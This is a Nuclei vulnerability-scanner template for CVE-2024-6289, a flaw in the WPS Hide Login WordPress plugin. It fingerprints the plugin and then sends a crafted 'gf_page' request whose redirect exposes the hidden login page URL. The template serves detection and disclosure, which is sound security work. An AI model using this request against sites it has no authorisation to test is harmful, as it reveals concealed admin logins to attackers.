WPS Hide Login < 1.9.16.4 - Hidden Login Page Disclosure

id: CVE-2024-6289

info:
  name: WPS Hide Login < 1.9.16.4 - Hidden Login Page Disclosure
  author: securityforeveryone
  severity: medium
  description: |
    The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.
  remediation: Fixed in 1.9.16.4
  reference:
    - https://wpscan.com/vulnerability/fd6d0362-df1d-4416-b8b5-6e5d0ce84793/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6289
    - https://www.sprocketsecurity.com/resources/discovering-wp-admin-urls-in-wordpress-with-gravityforms/
  classification:
    epss-score: 0.00043
    epss-percentile: 0.09266
  metadata:
    verified: true
    max-request: 1
    vendor: wpserveur
    product: wps_hide_login
    framework: wordpress
    publicwww-query: "/wp-content/plugins/wps-hide-login/"
  tags: cve,cve2024,bypass,wp-plugin,wpscan,wordpress,wps-hide-login

flow: http(1) && http(2)

variables:
  string: "{{rand_text_alpha(10)}}"

http:
  - raw:
      - |
        GET /wp-content/plugins/wps-hide-login/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"WPS Hide Login")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /?gf_page={{string}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - '!contains(tolower(location), "wp-login.php")'
          - 'contains(header,"%2F%3Fgf_page%3D{{string}}&reauth=1")'
        condition: and

    extractors:
      - type: kval
        kval:
          - location
# digest: 4a0a00473045022020d4b2a669248c99076dbae2a47bd27614ff41baa828ef6b8f09219e7f5804c10221008cea48e05a376902a9024b466cdcb72992fa8239336fc3085e7ba319e6627de7:922c64590222798bb761d5b6d8e72950